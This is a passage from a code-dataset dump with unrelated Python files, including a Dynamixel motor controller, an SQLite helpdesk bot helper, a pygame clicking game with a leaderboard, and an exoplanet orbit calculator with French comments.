output=True)\nmounts.append(output_mount)\n\nprint(mounts)\n\nTHIS_FILE_DIR = os.path.realpath(os.path.dirname(__file__))\ndd.launch_python(\n target=os.path.join(THIS_FILE_DIR, 'app_main.py'),\n # point to a target script. If running remotely, this will be copied over\n mode=MY_RUN_MODE,\n mount_points=mounts,\n args={\n 'arg1': 50,\n 'arg2': 25,\n 'output_dir': OUTPUT_DIR,\n }\n)\n#\n# LOG_DIR = '/home/thanard/Downloads/rllab/data/test-ec2/'\n# THIS_FILE_DIR = '/home/thanard/Downloads/rllab/sandbox/thanard/infoGAN'\n# # DEMO_FILE= '/home/giulia/NIPS/softqlearning/softqlearning/environments/goals/ant_10_goals.pkl'\n# # ENV_FILE = '/home/giulia/NIPS/softqlearning/low_gear_ratio_ant.xml'\n# dd.launch_tools.launch_python(\n# target=os.path.join(THIS_FILE_DIR, 'infogan_2d.py'),\n# mode=MY_RUN_MODE,\n# mount_points=mounts,\n# args={\n# 'log_dir': OUTPUT_DIR,\n# # 'file_goals' : DEMO_FILE,\n# # 'file_env' : ENV_FILE,\n# 'save_file': OUTPUT_DIR,\n# },\n# verbose=True\n# )\n","sub_path":"examples/ec2_launch/ec2_launch_test.py","file_name":"ec2_launch_test.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"318917008","text":"import csv\nimport difflib\nimport pandas as pd\n#import files\n\nusers = []\nwith open('ntr_min.csv', 'rb') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in csvreader:\n users.append(row)\n\n#1001 companies\ntop_companies = []\nwith open('../fortune500.csv', 'rb') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n top_companies.append(row[2])\n\n#819 schools\ntop_schools = []\nwith open('../best_schools.csv', 'rb') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n top_schools.append(row[1])\n\n\n\n# company_bins = [0, 50, 200, 500, len(top_companies), len(top_companies)+1, len(top_companies)+2]\n# company_bin_labels = ['T1', 'T2', 'T3', 'T4', 'T5', 'NONE']\n# school_bins = [0, 50, 200, 500, len(top_schools), len(top_schools)+1, len(top_schools)+2]\n# school_bin_labels = ['T1', 'T2', 'T3', 'T4', 'T5', 'NONE']\n\n\n#functions\ndef formatCompany(company):\n if company == 'N/A':\n return len(top_companies)+2\n best = difflib.get_close_matches(company, top_companies)\n if len(best) == 0:\n return len(top_companies)+1\n else:\n return top_companies.index(best[0])\n\n# else if top_companies.index(best[0]))\ndef formatSchool(school):\n if school == 'N/A':\n return len(top_schools)+2\n best = difflib.get_close_matches(school, top_schools)\n if len(best) == 0:\n return len(top_schools)+1\n else:\n return top_schools.index(best[0])\n\ndef formatUser(user):\n return [formatSchool(user[0])] + [formatCompany(x) for x in user[1:4]]\n\n#test\n#users = users[:10]\nschools_lab = [x[0] for x in users]\ncompanies1_lab= [x[1] for x in users]\ncompanies2_lab= [x[2] for x in users]\ncompanies3_lab= [x[3] for x in users]\n\n\nformatted_users = [formatUser(x) for x in users]\nschools = [x[0] for x in formatted_users]\ncompanies1 = [x[1] for x in formatted_users]\ncompanies2 = [x[2] for x in formatted_users]\ncompanies3 = [x[3] for x in formatted_users]\n\n\nwith open('ntr_form.csv', 'w+') as csvout:\n csvwriter = csv.writer(csvout, delimiter=',', quotechar='\"')\n for row in formatted_users:\n csvwriter.writerow(row)\n csvout.flush()\n","sub_path":"data/users/indeed/bestFitter_ntr.py","file_name":"bestFitter_ntr.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295703288","text":"import logging, os\n\nx = logging.getLogger(\"foo\")\n\nfh = logging.FileHandler(\"fh-logfile\")\nfh.setLevel(logging.INFO)\n\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nx.addHandler(fh)\nx.addHandler(ch)\n\nx.debug(\"Log one\")\nx.info(\"Log one\")\nx.warning(\"Log one\")\nx.error(\"Log one\")\n\n","sub_path":"logging/foo-logging.py","file_name":"foo-logging.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469757808","text":"API_VERSION_PREFIX = \"/v0\"\nAUTH_HEADER_NAME = 'X-RH-IDENTITY'\nFACT_NAMESPACE = \"system_profile\"\nINVENTORY_SVC_HOSTS_ENDPOINT = '/r/insights/platform/inventory/api/v1/hosts/%s?per_page=%s'\nMAX_UUID_COUNT = 20\nMOCK_FACT_NAMESPACE = 'mockfacts'\nMOCK_FACTS_FILE = 'drift/mock_data/mockfacts.json'\nSYSTEM_ID_KEY = 'id'\n\nCOMPARISON_SAME = \"SAME\"\nCOMPARISON_DIFFERENT = \"DIFFERENT\"\nCOMPARISON_INCOMPLETE_DATA = \"INCOMPLETE_DATA\"\n","sub_path":"drift/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615363967","text":"import maya.cmds as cmds\n\ndef select(i):\n button = cmds.button(l=\"sel\",w=25,h=20,c=lambda *args:cmds.select(i))\n \nsel = cmds.ls(sl=True)\n\nif len(sel)>0:\n if cmds.window('name',q=True,exists=True):\n cmds.deleteUI('name',window=True)\n my_window = cmds.window('name',t=\"Name\",w=100,h=500)\n my_scrollLayout = cmds.scrollLayout(horizontalScrollBarThickness=16,verticalScrollBarThickness=16)\n \n my_colLayout = cmds.columnLayout(adj=True)\n\n for i in sel:\n my_rowLayout = cmds.rowLayout(nc=2,p=my_colLayout)\n select(i)\n name = cmds.nameField(object=i,w=150)\n cmds.showWindow(my_window)\n","sub_path":"maya-mel_py_ui/python_tools/named_md.py","file_name":"named_md.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551495817","text":"from Jojo import *\r\n\r\nstand_masters = []\r\n\r\nstand_masters.append(Jojo(\"Jotaro\", \"190\", \"110\", date(1970, 3, 5), \"Star Platinum\", \"OraOra\"))\r\n\r\nwhile True:\r\n command = input(\"Write command \\r\\n\")\r\n\r\n if command == \"add\":\r\n new_stand_master = Jojo()\r\n new_stand_master.add()\r\n stand_masters.append(new_stand_master)\r\n\r\n if command == \"show\":\r\n for stand_master in stand_masters:\r\n print(stand_master.show())\r\n\r\n if command == \"show_stand\":\r\n for stand in stand_masters:\r\n print(stand.show_stand())\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"146831607","text":"f=open(\"ipl\",\"r\")\n#no,team,matches,win,loss,pts\nipldict={}\n\nfor lines in f:\n ipl=lines.rstrip(\"\\n\").split(\",\")\n\n no=ipl[0]\n team=ipl[1]\n matches=ipl[2]\n win=ipl[3]\n loss=ipl[4]\n pts=ipl[5]\n\n\n if no not in ipldict:\n ipldict[no]={\"no\":no,\"team\":team,\"matches\":matches,\"win\":win,\"loss\":loss,\"pts\":pts}\n else:\n pass\nfor key,value in ipldict.items():\n print(key,\"->\",value)\n\n\ndef printDetails(**arg):\n num=arg[\"no\"]\n prope=arg[\"prop\"]\n print(ipldict[num][\"team\"])\n print(ipldict[num][prope])\n\n","sub_path":"LuminarProject/corepythonexam/iplpgm.py","file_name":"iplpgm.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"193308080","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 17 12:07:33 2019\n\n@author: Ben Boys\n\nFile name: \"motor_control.py\"\nDescription: Provice interface functions for controlling Dynamixel AX-21A motors.\nUse interface functions provided by DynamixelSDK\nAbbreviations: comm communication\n ax AX-12A\n \n\"\"\"\n\n## Initiate global variables\n\n## Perhaps create a dictionary for all the attributes of a specific motor\n# import modules\nimport os # for key presses, reading and writing\nfrom packet_handler import PacketHandler\nfrom port_handler import PortHandler\nimport AX_constants as AX\n\n# Initialize PortHandler instance\n# Set the port path\nportHandler = PortHandler(AX.DEVICE_PORT)\n\n# Initialize PacketHandler instance\n# Set the protocol version\npacketHandler = PacketHandler(AX.DEVICE_PROTOCOL)\n\ndef getch():\n \"\"\"Arguments:\n Return: ch\n Description: commands to get key presses\n \"\"\"\n if os.name == 'nt':\n import msvcrt\n return msvcrt.getch().decode()\n else:\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\ndef openPort():\n \"\"\"\n Arguments:\n Return: True if successfull\n False if not sucessfull\n Description:\n First does commands to get keypresses from keyboard input\n Initialize the serial port for communication with the motor\n \"\"\"\n # Open port\n if portHandler.openPort():\n print(\"Succeeded to open the port\")\n else:\n print(\"Failed to open the port\")\n print(\"Press any key to terminate...\")\n getch()\n quit()\n # Set port baudrate\n if portHandler.setBaudRate(AX.DEVICE_BAUDRATE):\n print(\"Succeeded to change the baudrate\")\n else:\n print(\"Failed to change the baudrate\")\n print(\"Press any key to terminate...\")\n getch()\n quit()\n \n return(None)\n \ndef closePort():\n \"\"\"Arguments:\n Return:\n Description: Close the serial port.\"\"\"\n # Close port\n portHandler.closePort()\n \n return None\n \ndef ping(ax_id):\n \"\"\"Arguments: Motor ID\n Return: True if successful, False if not successfull\n Description: Try to ping the Dynamixel \"\"\"\n dxl_model_number, dxl_comm_result, dxl_error = packetHandler.ping(portHandler, ax_id)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n return False\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n return False\n else:\n print(\"[ID:%03d] ping Succeeded. Dynamixel model number : %d\" % (ax_id, dxl_model_number))\n return True\n\ndef enableTorque(ax_id):\n \"\"\"Arguments: Motor ID\n Return: True if successful, False if not successful.\n Description: Enable torque, this will make the motor stiff, and able to provide torque.\"\"\"\n # Enable Dynamixel Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, ax_id, AX.ADDR_TORQUE_ENABLE, AX.TORQUE_ENABLE)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n return False\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n return False\n else:\n print(\"Dynamixel has been successfully connected\") \n \n return True\n\ndef disableTorque(ax_id):\n \"\"\"Arguments: Motor ID\n Return: True if successful, False if not successul\n Description: Disable torque.\"\"\"\n # Disable Dynamixel Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, ax_id, AX.ADDR_TORQUE_ENABLE, AX.TORQUE_DISABLE)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n \ndef writePosition(ax_id, degrees, fractional_speed):\n \"\"\"Arguments: Motor ID. Goal position in degrees.\n Return:\n Description: Set the goal position for the motor specifed.\n \"\"\"\n motor_degrees = 150 - degrees\n position_float = motor_degrees/ 300.0 * 1023.0\n position = round(position_float)\n \n speed_float = fractional_speed*1023.0\n speed = round(speed_float)\n\n # Write goal position\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler, ax_id, AX.ADDR_GOAL_POSITION, position, speed)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"write success\")\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n return position\n\n\ndef readPosition(ax_id):\n # Read present position\n dxl_present_position, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, ax_id, AX.ADDR_PRESENT_POSITION)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n print(\"[ID:%03d] PresPos:%03d\" % (ax_id, dxl_present_position))\n return dxl_present_position\n\n# =============================================================================\n# BASIC FUNCTIONS\n# =============================================================================\n# =============================================================================\n# I have written functions for:\n# open_port() DONE\n# close_port() DONE\n# check_error() I have instead written a ping function, sufficient for now?\n# bool_enable_torque() DONE\n# disable_torque() DONE\n# write_position() DONE\n# write_speed() IN-PROGRESS - NOT WORKING\n# \n# joints_degrees IN PROGRESS this is a list of planned next-move motor positions, a data structure\n# \n# TODO: CONVERT DXL_MOVING_STATUS_THRESHOLD to a DEGREES value\n# TODO: CHECK THAT writePosition is ROBUST, and it is OKAY to perform this function and return a value to be used as a variable. I suspect not.\n# =============================================================================\n","sub_path":"tests/motor_control.py","file_name":"motor_control.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"570747243","text":"class Global:\n objects = []\n INDEX = 0\n\n # def __init__(self):\n # Global.objects +=\n\n def increment(self):\n self.INDEX += 1\n\n @staticmethod\n def show_message():\n print('CLASS STATIC METHOD')\n\n # @staticmethod\n # def convert_string(value: str):\n # return value.upper()\n\n @classmethod\n def increments(cls):\n cls.INDEX += 1\n\n\na = Global()\na.increment()\nprint(a.INDEX)\n\nb = Global()\nprint(b.INDEX)\n\nb.show_message()\nGlobal.show_message()\n\nGlobal.increments()\nb.increments()\nprint(b.INDEX)\n","sub_path":"lesson07/staticclasses.py","file_name":"staticclasses.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"494859284","text":"import os\r\nfrom PIL import Image\r\n\r\n#get the directory name\r\ndirname = raw_input('directory:\\t')\r\n#get the list of jpg file names\r\npicNames = []\r\nfor file in os.listdir(r'{0}'.format(dirname)):\r\n\tif (\"_sm\" not in file):\r\n\t\tif (file.endswith(\".JPG\")) or (file.endswith(\".jpg\")):\r\n\t\t\tfileName = file.split(\".\")\r\n\t\t\tpicNames.append(fileName[0])\r\ni = 0\t\r\n#iterate for each jpg file in the folder\r\nwhile i < len(picNames):\r\n\timg = Image.open(\"./\" + dirname + \"/\" + picNames[i] + \".JPG\")\r\n\tnew_width = 500\r\n\tnew_height = 250\r\n\timg = img.resize((new_width, new_height), Image.ANTIALIAS)\r\n\timg.save(\"./\" + dirname + \"/\" + picNames[i] + \"_sm.JPG\")\r\n\timg.close()\r\n\ti = i + 1","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"319559439","text":"import sqlite3\n\n\nclass DBHelper:\n\n def __init__(self, dbname=\"servicebot.sqlite\"):\n self.dbname = dbname\n self.conn = sqlite3.connect(dbname)\n\n def setup(self):\n tblstmt = \"CREATE TABLE IF NOT EXISTS items (description text, owner text)\"\n tblstmt2 = \"CREATE TABLE IF NOT EXISTS cases (ticket_no number, log_date text, owner text, subject text, detail text,assignee text, department text, owner_fname text, owner_lname text, owner_phn text, owner_email text, owner_loc text, priority number)\"\n itemidx = \"CREATE INDEX IF NOT EXISTS itemIndex ON items (description ASC)\" \n ownidx = \"CREATE INDEX IF NOT EXISTS ownIndex ON items (owner ASC)\"\n self.conn.execute(tblstmt)\n self.conn.execute(tblstmt2)\n self.conn.execute(itemidx)\n self.conn.execute(ownidx)\n self.conn.commit()\n\n def add_item(self, item_text, owner):\n stmt = \"INSERT INTO items (description, owner) VALUES (?, ?)\"\n args = (item_text, owner)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def delete_item(self, item_text, owner):\n stmt = \"DELETE FROM items WHERE description = (?) AND owner = (?)\"\n args = (item_text, owner )\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_items(self, owner):\n stmt = \"SELECT description FROM items WHERE owner = (?)\"\n args = (owner,)\n return [x[0] for x in self.conn.execute(stmt, args)]\n\n def delete_chat(self,owner):\n #stmt = \"UPDATE items SET description = '' WHERE owner = (?)\"\n stmt = \"DELETE FROM items WHERE owner = (?)\"\n args = (owner,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def delete_case(self,ticket_no):\n #stmt = \"UPDATE items SET description = '' WHERE owner = (?)\"\n stmt = \"DELETE FROM cases WHERE ticket_no = (?)\"\n args = (ticket_no,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def add_case_subject(self,ticket_no, text, chat, firstName, lastName, date_today):\n stmt = \"INSERT into cases (ticket_no,log_date, owner, subject, owner_fname, owner_lname) values (?,?,?,?,?,?)\"\n args = (ticket_no,date_today,chat,text,firstName,lastName)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_case_subject(self,ticket_no ,chat, date_today):\n stmt = \"select * from cases where log_date = (?) and owner = (?) and ticket_no = (?)\"\n args = (date_today,chat,ticket_no)\n result = [x for x in self.conn.execute(stmt, args)]\n #print(result)\n return result\n\n def get_case_department(self,ticket_no ,chat):\n stmt = \"select department from cases where owner = (?) and ticket_no = (?)\"\n args = (chat,ticket_no)\n result = [x for x in self.conn.execute(stmt, args)]\n #print(result)\n return result[0]\n\n def delete_invalid_cases(self,chat):\n stmt = \"delete from cases where (subject is NULL or (owner_phn is null and owner_loc is null)) and owner = (?)\"\n args = (chat,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def update_case_detail(self,text, chat, date_today,ticket_no,department):\n stmt = \"update cases set detail = (?),department = (?) where owner = (?) and log_date = (?) and ticket_no = (?)\"\n args = (text,department,chat,date_today,ticket_no)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def update_case_phn_loc(self,phn,loc, chat, date_today,assignee,ticket_no):\n stmt = \"update cases set owner_phn = (?), owner_loc = (?), assignee = (?) where owner = (?) and log_date = (?) and ticket_no = (?)\"\n args = (phn,loc,assignee,chat,date_today,ticket_no)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_pending_case(self,chat):\n stmt = \"select * from cases where owner = (?)\"\n args = (chat,)\n result = [x for x in self.conn.execute(stmt, args)]\n #print(result)\n return result\n\n def update_priority(self,chat,priority,ticket_no):\n stmt = \"update cases set priority = (?) where owner = (?) and ticket_no = (?)\"\n args = (priority,chat,ticket_no)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n\n\n\n\n","sub_path":"dphelperSqllite.py","file_name":"dphelperSqllite.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"23443324","text":"#!/usr/bin/env python\nfrom __future__ import division\n\nimport math\nimport torch, torch.nn as nn\nfrom torch.autograd import Variable\n\nclass PositionalEmbeddings(nn.Module):\n\n def __init__(self, d_model, dropout_rate, max_seq_len=1024):\n super(PositionalEmbeddings, self).__init__()\n self.dropout = nn.Dropout(dropout_rate)\n\n pe = torch.zeros(max_seq_len, d_model)\n for pos in range(max_seq_len):\n for i in range(0, d_model, 2):\n pe[pos, i] = math.sin(pos / (10000 ** (2 * i / d_model)))\n pe[pos, i+1] = math.cos(pos / (10000 ** (2 * (i + 1) / d_model)))\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + Variable(self.pe[:, :x.shape[1]], requires_grad=False)\n return self.dropout(x)\n","sub_path":"models/nn/positional_embeddings.py","file_name":"positional_embeddings.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"363348279","text":"import pygame\nfrom random import randint\nimport time\nimport sys\nimport re\n\n\nwith open('records_new.txt', 'r') as file:\n tr = file.read()\n tr = re.split(r'\\n', tr)\n d = open('records.txt', 'w')\n for o in range(5):\n d.write(f'{tr[o]}\\n')\n d.close()\n\nUSERNAME = 'Player'\n\nsize = width, height = 1920, 1080\nscore = 0\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMAGENTA = (255, 0, 255)\nCYAN = (0, 255, 255)\nBLACK = (0, 0, 0)\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\n\nglobal r1, r2, r3, r4, r5, r6\nglobal circle1_x, circle2_x, circle3_x, circle4_x, circle5_x\nglobal circle1_y, circle2_y, circle3_y, circle4_y, circle5_y\n\n\ndef main():\n pygame.init()\n\n game_over = False\n\n global score, r1, r2, r3, r4, r5, r6\n global circle1_x, circle2_x, circle3_x, circle4_x, circle5_x\n global circle1_y, circle2_y, circle3_y, circle4_y, circle5_y\n\n screen = pygame.display.set_mode(size)\n\n # Задание параметров кругов\n r1 = randint(30, 60)\n circle1_x = randint(r1, width-r1)\n circle1_y = randint(r1, height-r1)\n a1 = randint(1, 5)\n b1 = randint(1, 5)\n r2 = randint(30, 60)\n circle2_x = randint(r2, width-r2)\n circle2_y = randint(r2, height-r2)\n a2 = randint(1, 5)\n b2 = randint(1, 5)\n r3 = randint(30, 60)\n circle3_x = randint(r3, width-r3)\n circle3_y = randint(r3, height-r3)\n a3 = randint(1, 5)\n b3 = randint(1, 5)\n r4 = randint(30, 60)\n circle4_x = randint(r4, width-r4)\n circle4_y = randint(r4, height-r4)\n a4 = randint(1, 5)\n b4 = randint(1, 5)\n\n # Следующий объект - элипс с меньшим размером и большей скоростью\n r5 = randint(10, 20)\n r6 = randint(20, 40)\n circle5_x = randint(r5, width-r5)\n circle5_y = randint(r5, height-r5)\n a5 = randint(10, 15)\n b5 = randint(10, 15)\n\n # Задание вектора скорости\n dx = 1\n dy = 1\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n screen.fill(BLACK)\n circle1_x += a1 * dx\n circle1_y += b1 * dy\n circle2_x -= a2 * dx\n circle2_y -= b2 * dy\n circle3_x += a3 * dx\n circle3_y -= b3 * dy\n circle4_x -= a4 * dx\n circle4_y += b4 * dy\n circle5_x += a5 * dx\n circle5_y += b5 * dy\n\n # Изменение вектора скорости при взаимодействии со стенкой\n if circle1_y > height-r1 or circle1_y < r1:\n b1 *= -1\n if circle1_x > width - r1 or circle1_x < r1:\n a1 *= -1\n if circle2_y > height-r2 or circle2_y < r2:\n b2 *= -1\n if circle2_x > width - r2 or circle2_x < r2:\n a2 *= -1\n if circle3_y > height-r3 or circle3_y < r3:\n b3 *= -1\n if circle3_x > width - r3 or circle3_x < r3:\n a3 *= -1\n if circle4_y > height-r4 or circle4_y < r4:\n b4 *= -1\n if circle4_x > width - r4 or circle4_x < r4:\n a4 *= -1\n if circle5_y > height - r6 or circle5_y < r6:\n b5 *= -1\n if circle5_x > width - r5 or circle5_x < r5:\n a5 *= -1\n\n pygame.draw.circle(screen, COLORS[1], (circle1_x, circle1_y), r1)\n pygame.draw.circle(screen, COLORS[2], (circle2_x, circle2_y), r2)\n pygame.draw.circle(screen, COLORS[3], (circle3_x, circle3_y), r3)\n pygame.draw.circle(screen, COLORS[4], (circle4_x, circle4_y), r4)\n pygame.draw.ellipse(screen, COLORS[5], (circle5_x, circle5_y, r5, r6))\n pygame.display.flip()\n pygame.time.wait(10)\n\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n click(event)\n# Составление лидерборда\n if (time.time() - start_time) >= 5:\n with open(\"records.txt\", \"r\") as file:\n get = file.read()\n get_2 = re.split(r'\\n', get)\n get_1 = re.findall(r'\\d{1,3}', get)\n print(get_1)\n for i in range(len(get_1)):\n if score >= int(get_1[i]):\n for j in range(4, i, -1):\n get_2[j] = get_2[j-1]\n get_2[i] = f'{USERNAME} : {score}'\n print(get_2)\n f = open('records_new.txt', 'w')\n for m in range(5):\n f.write(f'{get_2[m]}\\n')\n f.close()\n sys.exit()\n\n\n# Проверка попаданий кликами\ndef click(eve):\n global score, r1, r2, r3, r4, r6\n global circle1_x, circle2_x, circle3_x, circle4_x, circle5_x\n global circle1_y, circle2_y, circle3_y, circle4_y, circle5_y\n xt, yt = eve.pos\n if ((xt-circle1_x)**2 + (yt-circle1_y)**2)**(1/2) <= r1:\n score += 1\n if ((xt-circle2_x)**2 + (yt-circle2_y)**2)**(1/2) <= r2:\n score += 1\n if ((xt-circle3_x)**2 + (yt-circle3_y)**2)**(1/2) <= r3:\n score += 1\n if ((xt-circle4_x)**2 + (yt-circle4_y)**2)**(1/2) <= r4:\n score += 1\n if ((xt-circle5_x)**2 + (yt-circle5_y)**2)**(1/2) <= r6:\n score += 3\n\n\n\nif __name__ == '__main__':\n start_time = time.time()\n main()\n pygame.quit()\n","sub_path":"lab5/game_1.py","file_name":"game_1.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300673481","text":"# -.- coding:latin1 -.-\r\n# @author: Nicolas\r\n\"\"\"Ce programme trace la trajectoire en 2D de différentes exoplanètes autour\r\nde leur étoile correspondante et effectue quelques vérifications en trouvant\r\ndes résultats facilement prévisibles.\"\"\"\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\ndef positionExo(orbite, masseEtoile, temps):\r\n \"\"\"Cette fonction renvoie la position en 2D d'une exoplanète en\r\n orbite autour de son étoile si on lui fournit les paramètres de\r\n l'orbite qu'on cherche à calculer en agrument.\r\n orbite : Paramètres de l'orbite de l'exoplanète (ndarray contenant,\r\n dans l'ordre, le demi-grand axe de l'orbite, son excentricité et \r\n son anomalie moyenne au début de son parcours)\r\n temps : Temps où on veut mesurer la position (ndarray)\r\n masseEtoile : Masse de l'étoile de l'exoplanète (int)\r\n \"\"\"\r\n temps = np.atleast_1d(temps)\r\n # On transforme un temps qui aurait été entré comme un scalaire en ndarray\r\n demiGrandAxe, excentricite, anomalieMoyenneDepart = orbite\r\n # On déballe les paramètres contenu dans le ndarray orbite\r\n\r\n periode = np.sqrt(demiGrandAxe ** 3 / masseEtoile)\r\n # On trouve la période de l'orbite\r\n anomalieMoyenne = anomalieMoyenneDepart + 2 * np.pi * temps / periode\r\n # On trouve l'anomalie moyenne au temps recherché\r\n\r\n anomalieExcentrique = np.where(anomalieMoyenne % (2 * np.pi) < np.pi,\r\nanomalieMoyenne + excentricite / 2, anomalieMoyenne - excentricite / 2)\r\n # On trouve la valeur de départ pour le calcul de l'anomalie excentrique\r\n\r\n precision = np.ones(anomalieExcentrique.size)\r\n # On s'assure de faire la première itération\r\n\r\n actifs = np.ones(precision.size, dtype=bool)\r\n\r\n \"\"\"On définit un ndarray qui tiendra le compte des anomalie excentriques\r\n ayant la précision exigée\"\"\"\r\n\r\n iActifs, = actifs.nonzero()\r\n\r\n \"\"\"On définit un ndarray qui tiendra le compte des indices des anomalies\r\n excentriques qui manquent encore de précision\"\"\"\r\n\r\n while iActifs.size != 0:\r\n\r\n \"\"\"On continue les calculs jusqu'à ce qu'on aille la précision voulue\r\n pour chaque valeur d'anomalie excentrique recherchée\"\"\"\r\n\r\n dAnomalieExcentrique = -(anomalieMoyenne[iActifs] -\r\nanomalieExcentrique[iActifs] + excentricite * \r\nnp.sin(anomalieExcentrique[iActifs])) / (-1 + excentricite * \r\nnp.cos(anomalieExcentrique[iActifs]))\r\n \r\n \"\"\"On calcule dans un ndarray lee nouvelles différences entre les\r\n valeurs d'anomalies excentriques en utilisant la méthode de Newton,\r\n soit en évaluant le rapport entre la fonction dont on recherche le\r\n zéro et sa dérivée au point calculé précédemment\"\"\"\r\n\r\n anomalieExcentrique[iActifs] += dAnomalieExcentrique\r\n # On modifie les anomalies excentriques qui ont besoin de l'être\r\n precision[iActifs] = abs(dAnomalieExcentrique)\r\n # On modifie la précision des anomalies qu'on a nouvellement calculé\r\n\r\n actifs[iActifs] = np.where(precision[iActifs] > 1e-12, True, False)\r\n\r\n \"\"\"On met à jour quelles anomalies excentriques doivent être\r\n recalculées\"\"\"\r\n\r\n iActifs, = actifs.nonzero()\r\n\r\n \"\"\"On met à jour les indices des anomalies excentriques qui manquent \r\n encore de précision\"\"\"\r\n\r\n distanceEtoile = demiGrandAxe * (1 - excentricite * \r\nnp.cos(anomalieExcentrique))\r\n # On calcule la distance entre l'étoile et l'exoplanète\r\n\r\n anomalieVraie = 2 * np.arctan2(np.sqrt(1 - excentricite) * \r\nnp.cos(anomalieExcentrique / 2), np.sqrt(1 + excentricite) *\r\nnp.sin(anomalieExcentrique / 2))\r\n # On calcule l'anomalie vraie au temps recherché\r\n\r\n positionX0 = distanceEtoile * np.cos(anomalieVraie)\r\n # On trouve la position en x de l'exoplanète aux temps recherchés\r\n positionY0 = distanceEtoile * np.sin(anomalieVraie)\r\n # On trouve la position en y de l'exoplanète aux temps recherchés\r\n\r\n return positionX0, positionY0\r\n\r\nplt.figure(0)\r\n# On crée la première figure\r\n\r\nmasseEtoile = 1\r\ndemiGrandAxe = 1\r\nexcentricite = [0, 0.5, 0.8]\r\nanomalieMoyenneDepart = 0\r\ntemps = np.linspace(0, 1, 1001)\r\n# On définit les paramètres de départ\r\niTempsPointe = np.arange(0, 1001, 100)\r\n# On définit un ndarray avec les indices de temps où 